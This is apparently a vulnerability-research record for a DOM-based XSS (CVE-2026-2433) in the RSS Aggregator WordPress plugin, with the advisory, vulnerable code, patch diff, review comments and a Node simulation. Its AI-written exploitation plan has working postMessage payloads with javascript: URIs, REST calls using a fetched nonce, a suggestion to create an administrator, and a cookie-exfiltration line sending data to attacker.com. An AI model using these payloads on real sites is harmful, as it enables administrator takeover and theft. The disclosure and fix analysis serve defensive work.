[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fyWs2tOP_QYkjVk-65UJs4CVTK4nHWAXYR29eYKLN4Ls":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-2433","rss-aggregator-rss-import-news-feeds-feed-to-post-and-autoblogging-unauthenticated-dom-based-reflected-cross-site-script","RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging \u003C= 5.0.11 - Unauthenticated DOM-Based Reflected Cross-Site Scripting via postMessage","The RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to DOM-Based Cross-Site Scripting via postMessage in all versions up to, and including, 5.0.11. This is due to the plugin's admin-shell.js registering a global message event listener without origin validation (missing event.origin check) and directly passing user-controlled URLs to window.open() without URL scheme validation. 
This makes it possible for unauthenticated attackers to execute arbitrary JavaScript in the context of an authenticated administrator's session by tricking them into visiting a malicious website that sends crafted postMessage payloads to the plugin's admin page.","wp-rss-aggregator",null,"\u003C=5.0.11","5.0.12","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-06 19:00:27","2026-03-07 07:22:07",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F311960e7-c4b4-4638-980f-1e08ffa621ba?source=api-prod",1,[22,23,24,25,26,27,28,29],"core\u002Fadmin-frame.php","core\u002Fjs\u002Fadmin-shell.js","core\u002Fjs\u002Fdist\u002Fadmin.js","core\u002Fmodules\u002Fadmin.php","core\u002Fmodules\u002FdebugInfo.php","core\u002Fmodules\u002FfeedItems.php","core\u002Fmodules\u002Frenderer.php","core\u002Fmodules\u002FrowActions.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-2433\n\n## 1. Vulnerability Summary\nThe **RSS Aggregator** plugin (versions \u003C= 5.0.11) contains a DOM-based reflected Cross-Site Scripting (XSS) vulnerability. The vulnerability exists in the `core\u002Fjs\u002Fadmin-shell.js` file, which manages the plugin's administrative user interface. The script registers a global `message` event listener to facilitate communication between the main WordPress admin window (the \"shell\") and an internal iframe (the \"frame\"). \n\nThe listener fails to validate the `origin` of incoming `postMessage` events and subsequently passes a user-controlled URL from the message payload directly into `window.open()`. Because `window.open()` accepts `javascript:` URIs and no scheme validation is performed, an attacker can execute arbitrary JavaScript in the context of the administrator's session.\n\n## 2. 
Attack Vector Analysis\n- **Target Page**: `\u002Fwp-admin\u002Fadmin.php?page=wprss-aggregator`\n- **Vulnerable Script**: `core\u002Fjs\u002Fadmin-shell.js` (Enqueued as `wpra-admin-shell`)\n- **Message Event Listener**: `window.addEventListener(\"message\", ...)`\n- **Trigger Message Type**: `wpra:openUrl` (defined as `FrameMessage.openUrl`)\n- **Payload Parameter**: `payload.url`\n- **Authentication Requirement**: The victim must be an authenticated administrator capable of accessing the plugin's admin page.\n- **Precondition**: The victim must be tricked into visiting a malicious website while their WordPress admin session is active.\n\n## 3. Code Flow\n1.  **Listener Registration**: In `core\u002Fjs\u002Fadmin-shell.js`, the `WpraAdminApp` class calls `this.frame.onReceive(FrameMessage.openUrl, ...)` inside its `listenForMessages()` method.\n2.  **Generic Listener**: The `onReceive` method (in the `AppFrame` class) registers the global listener:\n    ```javascript\n    onReceive(type, handler) {\n      window.addEventListener(\"message\", (event) => {\n        const msg = event.data ?? {}\n        if (typeof msg === \"object\" && (msg.type ?? \"\") === type) {\n          handler(msg.payload)\n        }\n      })\n    }\n    ```\n    *Note: There is no `if (event.origin !== ...)` check here.*\n3.  **Handler Execution**: When a message with `type: \"wpra:openUrl\"` is received, the handler in `WpraAdminApp` executes:\n    ```javascript\n    this.frame.onReceive(FrameMessage.openUrl, (payload) => {\n      \u002F\u002F ... payload validation (checks if payload.url is string)\n      if (payload.target) {\n        window.open(payload.url, payload.target) \u002F\u002F SINK\n      } else {\n        this.frame.navigate(payload.url, \"openUrl\")\n      }\n      return\n    })\n    ```\n4.  **Sink**: `window.open(payload.url, payload.target)` is called. 
If `payload.url` starts with `javascript:`, the browser executes the script in the administrator's origin: with `payload.target` set to `_self` (or the name of the current window) it runs in the admin page itself; with any other target it runs in a newly opened `about:blank` window that inherits the admin page's origin and holds an `opener` reference back to it.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability **does not require a WordPress nonce**. \nThe `message` event listener is registered globally on the `window` object immediately upon loading the `\u002Fwp-admin\u002Fadmin.php?page=wprss-aggregator` page. It does not check for any tokens or nonces within the `postMessage` data before processing the `wpra:openUrl` request.\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate that an external site can force the WordPress admin page to execute JavaScript.\n\n### Step-by-Step Plan:\n1.  **Victim Login**: The agent will log in as an administrator.\n2.  **Malicious Page Simulation**: Since the agent cannot easily host an external site in the environment, it will simulate the \"malicious site\" by opening the vulnerable WordPress page in a new window\u002Ftab and then sending the `postMessage`.\n3.  **The Payload**:\n    ```javascript\n    {\n      type: \"wpra:openUrl\",\n      payload: {\n        url: \"javascript:window.wpra_xss_vulnerable = true; alert('XSS: ' + document.domain);\",\n        target: \"_self\"\n      }\n    }\n    ```\n\n### Execution via `http_request` \u002F `browser_eval`:\nInstead of an external site, we will use `browser_navigate` to go to the vulnerable page and then use `browser_eval` to simulate a message arriving at that window.\n\n1.  **Navigate**: `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=wprss-aggregator\")`\n2.  **Trigger**:\n    ```javascript\n    window.postMessage({\n      type: \"wpra:openUrl\",\n      payload: {\n        url: \"javascript:window.wpra_xss_vulnerable = true; console.log('XSS_SUCCESS');\",\n        target: \"_self\"\n      }\n    }, \"*\");\n    ```\n\nCaveat: a message the page posts to itself arrives with `event.origin` equal to the page's own origin, so this simulation exercises only the missing scheme check on `payload.url`. The missing origin check is only demonstrated when the message is sent from a different origin, for example from a page on another host or port that obtained a handle to the admin window through `window.open()` and posted with a `\"*\"` target origin.\n\n## 6. Test Data Setup\n1.  
**Plugin Activation**: Ensure `wp-rss-aggregator` is active.\n2.  **User**: An administrator user (e.g., `admin` \u002F `password`).\n3.  **No specific shortcodes or posts are required**, as the script is enqueued on the main plugin settings page.\n\n## 7. Expected Results\n- The `window.open` function will be called with the `javascript:` URI.\n- The JavaScript inside the URI will execute in the context of the WordPress admin page.\n- In the simulation, `window.wpra_xss_vulnerable` will become `true`.\n\n## 8. Verification Steps\n1.  **Check Variable**: Use `browser_eval(\"window.wpra_xss_vulnerable\")` to check if it returns `true`.\n2.  **Console Logs**: Check browser logs for the string `XSS_SUCCESS`.\n3.  **State Verification**: Use the XSS to perform an action, such as creating a new administrator, then verify via WP-CLI:\n    ```bash\n    wp user list --role=administrator\n    ```\n\n## 9. Alternative Approaches\nIf the `javascript:` navigation with target `_self` is blocked in the test environment, use a payload that modifies the DOM or calls the REST API:\n- **Payload**: `javascript:fetch('\u002Fwp-json\u002Fwp\u002Fv2\u002Fusers\u002Fme').then(r=>r.json()).then(d=>document.body.innerHTML='HACKED: '+d.name)`\n- This demonstrates the ability to interact with the WordPress REST API using the administrator's authenticated session.\n- Caveat: WordPress treats a cookie-authenticated REST request as unauthenticated unless it carries a valid `X-WP-Nonce` header, so the bare `fetch` above is answered with a 401 for `\u002Fusers\u002Fme`. Because the script runs inside the admin page it can obtain the nonce from the same session first (for example by fetching `\u002Fwp-admin\u002Fadmin-ajax.php?action=rest-nonce`) and send it as `X-WP-Nonce`.\n\n### Backup Payload (Cookie Exfiltration Simulation):\n```javascript\nwindow.postMessage({\n  type: \"wpra:openUrl\",\n  payload: {\n    url: \"javascript:document.location='http:\u002F\u002Fattacker.com\u002F?cookie='+btoa(document.cookie)\",\n    target: \"_self\"\n  }\n}, \"*\");\n```\n\nCaveat: WordPress sets its authentication cookies with the HttpOnly flag, so `document.cookie` does not expose them; this payload only shows that the admin page can be redirected to an attacker-controlled host. Useful post-exploitation stays in-page, using the administrator's session as the REST and DOM payloads above do.","The RSS Aggregator plugin (up to version 5.0.11) is vulnerable to DOM-based reflected Cross-Site Scripting (XSS) due to a flaw in its admin-shell.js script. 
The script registers a message event listener that lacks origin validation and blindly processes a 'wpra:openUrl' event, passing a user-controlled URL directly into window.open() without sanitizing for the javascript: protocol.","\u002F\u002F core\u002Fjs\u002Fadmin-shell.js line 56\n    onReceive(type, handler) {\n      window.addEventListener(\"message\", (event) => {\n        const msg = event.data ?? {}\n        if (typeof msg === \"object\" && (msg.type ?? \"\") === type) {\n          handler(msg.payload)\n        }\n      })\n    }\n\n---\n\n\u002F\u002F core\u002Fjs\u002Fadmin-shell.js line 142\n      \u002F\u002F Open links in the main window\n      this.frame.onReceive(FrameMessage.openUrl, (payload) => {\n        if (typeof payload !== \"object\" || typeof payload.url !== \"string\") {\n          console.error(FrameMessage.openUrl, \"payload is missing url\")\n          return\n        }\n\n        if (payload.target) {\n          window.open(payload.url, payload.target)\n        } else {\n          this.frame.navigate(payload.url, \"openUrl\")\n        }\n        return\n      })","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-rss-aggregator\u002F5.0.11\u002Fcore\u002Fjs\u002Fadmin-shell.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-rss-aggregator\u002F5.0.12\u002Fcore\u002Fjs\u002Fadmin-shell.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-rss-aggregator\u002F5.0.11\u002Fcore\u002Fjs\u002Fadmin-shell.js\t2025-09-16 08:50:00.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-rss-aggregator\u002F5.0.12\u002Fcore\u002Fjs\u002Fadmin-shell.js\t2026-03-03 10:20:48.000000000 +0000\n@@ -58,6 +58,10 @@\n       window.addEventListener(\"message\", (event) => {\n         const msg = event.data ?? {}\n         if (typeof msg === \"object\" && (msg.type ?? 
\"\") === type) {\n+          if (event.origin !== window.location.origin) {\n+            console.warn(\"WPRA: Blocked message from unauthorized origin:\", event.origin)\n+            return\n+          }\n           handler(msg.payload)\n         }\n       })\n@@ -149,6 +153,17 @@\n           return\n         }\n \n+        try {\n+          const url = new URL(payload.url, window.location.origin)\n+          if (![\"http:\", \"https:\"].includes(url.protocol)) {\n+            console.warn(FrameMessage.openUrl, \"Blocked potentially malicious URL:\", payload.url)\n+            return\n+          }\n+        } catch (e) {\n+          console.warn(FrameMessage.openUrl, \"Invalid URL:\", payload.url)\n+          return\n+        }\n+\n         if (payload.target) {\n           window.open(payload.url, payload.target)\n         } else {","To exploit this vulnerability, an attacker tricks an authenticated administrator into visiting a malicious website. This malicious site opens a new window or iframe pointing to the plugin's admin page at \u002Fwp-admin\u002Fadmin.php?page=wprss-aggregator. Once the WordPress page is loaded, the malicious site sends a postMessage with the type 'wpra:openUrl'. The payload contains a 'url' property set to a 'javascript:' URI (e.g., javascript:alert(document.cookie)) and a 'target' property set to '_self'. 
Since admin-shell.js does not check if the message came from a trusted origin or if the URL protocol is safe, it calls window.open() with the attacker-supplied script, executing it in the context of the administrator's session. In practice the attacker page must open the admin page with window.open() and keep the returned handle: WordPress sends an X-Frame-Options: SAMEORIGIN header for wp-admin pages, so a cross-origin iframe of the admin page does not render, whereas the opened window can be targeted with the handle's postMessage() using a '*' target origin once it has loaded.","gemini-3-flash-preview","2026-04-18 05:26:47","2026-04-18 05:27:14",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","5.0.11","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-rss-aggregator\u002Ftags\u002F5.0.11","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-rss-aggregator.5.0.11.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-rss-aggregator\u002Ftags\u002F5.0.12","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-rss-aggregator.5.0.12.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-rss-aggregator\u002Ftags"]
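Review bot: the origin check added in the first hunk of the admin-shell.js diff (`if (event.origin !== window.location.origin)`) admits any same-origin window, not only the plugin's own iframe; another wp-admin tab, or any content an attacker manages to get served from the site's origin, can still post `wpra:openUrl` to the shell. Since this listener is the shell's channel to one specific frame, also compare `event.source` with that frame's `contentWindow` so only the intended sender is accepted; the scheme allowlist in the later hunk limits what a same-origin sender can do, but a source check is the tighter boundary for a shell/frame channel and costs one comparison.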
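Review bot: the second hunk validates `new URL(payload.url, window.location.origin)` but then still hands the raw string to `window.open(payload.url, payload.target)` and, in the else branch, to `this.frame.navigate`; pass `url.href` instead, so the value that was checked is the value that is opened and so a relative `payload.url` resolves the way the check resolved it (against the origin, rather than against the document's `/wp-admin/admin.php` base, which is what `window.open` would use). A comment is also warranted: the allowlist restricts only the scheme, any external http(s) host passes, so it is the origin check in the first hunk that stops a foreign page from steering the administrator to an arbitrary site, and the two checks should be read as a pair.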
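The following is an added example, not code from the plugin or from the advisory. It models the `onReceive` listener and the `wpra:openUrl` handler quoted above in both their 5.0.11 and 5.0.12 forms against a small fake window, so the two checks from the patch can be exercised under Node without a browser. The site origin `https://wp.example`, the attacker origin `https://attacker.example`, and the helpers `makeWindow`, `installOpenUrlHandler`, `isSafeUrl` and `simulate` are this example's own assumptions; the constructed `ATTACK` message is shaped as the exploit outline describes.

```javascript
// Added example, not the plugin's code: a Node model of the admin-shell.js
// message channel with the 5.0.11 handler and the 5.0.12 checks side by side.
// A small fake window replaces the browser; the origins below are assumed.

const SHELL_ORIGIN = "https://wp.example";
const OPEN_URL = "wpra:openUrl"; // FrameMessage.openUrl, as named in the advisory

// Fake window: records message listeners and everything that reaches a sink.
function makeWindow(origin) {
  const listeners = [];
  const reached = [];
  return {
    location: { origin, href: origin + "/wp-admin/admin.php?page=wprss-aggregator" },
    reached,
    addEventListener(type, fn) {
      if (type === "message") listeners.push(fn);
    },
    open(url, target) {
      reached.push({ via: "window.open", url, target });
    },
    navigateFrame(url) {
      reached.push({ via: "frame.navigate", url, target: null });
    },
    // Stand-in for a postMessage arriving from `fromOrigin`.
    deliver(data, fromOrigin) {
      for (const fn of listeners) fn({ data, origin: fromOrigin });
    },
  };
}

// 5.0.11 onReceive: dispatches on msg.type alone, never looks at event.origin.
function onReceiveVulnerable(win, type, handler) {
  win.addEventListener("message", (event) => {
    const msg = event.data ?? {};
    if (typeof msg === "object" && (msg.type ?? "") === type) handler(msg.payload);
  });
}

// 5.0.12 onReceive: same dispatch plus the origin comparison added by the patch.
function onReceiveFixed(win, type, handler) {
  win.addEventListener("message", (event) => {
    const msg = event.data ?? {};
    if (typeof msg === "object" && (msg.type ?? "") === type) {
      if (event.origin !== win.location.origin) return; // blocked: foreign origin
      handler(msg.payload);
    }
  });
}

// Scheme allowlist from the patch. The URL parser lowercases the scheme, so
// "JavaScript:" is caught too; anything that fails to parse is rejected.
function isSafeUrl(raw, base) {
  try {
    return ["http:", "https:"].includes(new URL(raw, base).protocol);
  } catch (e) {
    return false;
  }
}

// The openUrl handler; `checkScheme` switches the 5.0.12 URL validation on.
// (The null guard on payload is this example's addition.)
function installOpenUrlHandler(win, onReceive, checkScheme) {
  onReceive(win, OPEN_URL, (payload) => {
    if (!payload || typeof payload !== "object" || typeof payload.url !== "string") return;
    if (checkScheme && !isSafeUrl(payload.url, win.location.origin)) return;
    if (payload.target) win.open(payload.url, payload.target); // the sink
    else win.navigateFrame(payload.url);
  });
}

// Deliver one message to a fresh shell of the given version; returns what reached a sink.
function simulate(version, data, fromOrigin) {
  const win = makeWindow(SHELL_ORIGIN);
  if (version === "5.0.11") installOpenUrlHandler(win, onReceiveVulnerable, false);
  else installOpenUrlHandler(win, onReceiveFixed, true);
  win.deliver(data, fromOrigin);
  return win.reached;
}

// Constructed attacker message, shaped as the advisory describes.
const ATTACK = {
  type: OPEN_URL,
  payload: { url: "javascript:alert(document.domain)", target: "_self" },
};

if (typeof require !== "undefined" && require.main === module) {
  console.log("5.0.11, foreign origin:", simulate("5.0.11", ATTACK, "https://attacker.example"));
  console.log("5.0.12, foreign origin:", simulate("5.0.12", ATTACK, "https://attacker.example"));
  console.log("5.0.12, same origin:   ", simulate("5.0.12", ATTACK, SHELL_ORIGIN));
}
```

Run under Node, the 5.0.11 model forwards the `javascript:` URL to `window.open()` for a message from the foreign origin, the 5.0.12 origin comparison drops that message, and the scheme allowlist drops the same payload even when it arrives from the site's own origin. The allowlist accepts protocol-relative and absolute http(s) URLs to any host, so it constrains the scheme only and leaves the destination to the origin check.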